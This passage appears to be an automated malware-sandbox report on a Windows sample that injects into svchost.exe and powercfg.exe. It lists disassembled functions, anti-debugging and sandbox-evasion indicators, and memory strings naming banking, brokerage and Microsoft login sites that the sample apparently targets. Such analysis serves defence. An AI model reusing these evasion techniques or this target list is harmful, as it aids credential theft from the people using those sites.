                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D6808E push ss; retf 4_2_02D6808F
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D53F4E pushad ; ret 4_2_02D53F59
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D674A0 push ebp; iretd 4_2_02D674A8
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D69C43 push cs; iretd 4_2_02D69C4A
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032B225F pushad ; ret 5_2_032B27F9
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032B27FA pushad ; ret 5_2_032B27F9
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032E09AD push ecx; mov dword ptr [esp], ecx5_2_032E09B6
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032B283D push eax; iretd 5_2_032B2858
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A8A2F0 push edi; iretd 5_2_02A8A2F9
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A7C732 push esp; iretd 5_2_02A7C733
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A7519F push ebp; iretd 5_2_02A751A7
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A81740 push edi; ret 5_2_02A81762
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A77942 push cs; iretd 5_2_02A77949
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A61C4D pushad ; ret 5_2_02A61C58
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_031063B5 push esp; retf 5_2_0310643F
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0310622C push cs; retf 5_2_03106243
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006548D7
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006D5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_006D5376
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00673187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00673187
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeAPI/Special instruction interceptor: Address: 32D31F4
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\powercfg.exeWindow / User API: threadDelayed 4304Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeWindow / User API: threadDelayed 5670Jump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102343
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeAPI coverage: 4.9 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\powercfg.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7736Thread sleep count: 4304 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7736Thread sleep time: -8608000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7736Thread sleep count: 5670 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7736Thread sleep time: -11340000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe TID: 7752Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\powercfg.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_006B445A
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BC6D1 FindFirstFileW,FindClose,0_2_006BC6D1
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006BC75C
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006BEF95
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006BF0F2
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006BF3F3
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006B37EF
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006B3B12
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006BBCBC
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A7C9B0 FindFirstFileW,FindNextFileW,FindClose,5_2_02A7C9B0
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006549A0
                Source: 320lF200.5.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: 320lF200.5.drBinary or memory string: global block list test formVMware20,11696497155
                Source: 320lF200.5.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: 320lF200.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: 320lF200.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 320lF200.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 320lF200.5.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: 320lF200.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 320lF200.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2612867629.000000000132F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 320lF200.5.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 320lF200.5.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 320lF200.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 320lF200.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 320lF200.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 320lF200.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 320lF200.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 320lF200.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 320lF200.5.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 320lF200.5.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: 320lF200.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 320lF200.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 320lF200.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 320lF200.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: 320lF200.5.drBinary or memory string: discord.comVMware20,11696497155f
                Source: 320lF200.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 320lF200.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 320lF200.5.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 320lF200.5.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: 320lF200.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 320lF200.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 320lF200.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: firefox.exe, 0000000A.00000002.2187174777.0000023F7B49D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpp
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeAPI call chain: ExitProcess graph end nodegraph_0-101117
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeAPI call chain: ExitProcess graph end nodegraph_0-101189
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02617ED3 LdrLoadDll,2_2_02617ED3
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C3F09 BlockInput,0_2_006C3F09
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00653B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00653B3A
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00685A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00685A7C
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00654B37 LoadLibraryA,GetProcAddress,0_2_00654B37
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_032D3460 mov eax, dword ptr fs:[00000030h]0_2_032D3460
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_032D34C0 mov eax, dword ptr fs:[00000030h]0_2_032D34C0
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_032D1E70 mov eax, dword ptr fs:[00000030h]0_2_032D1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
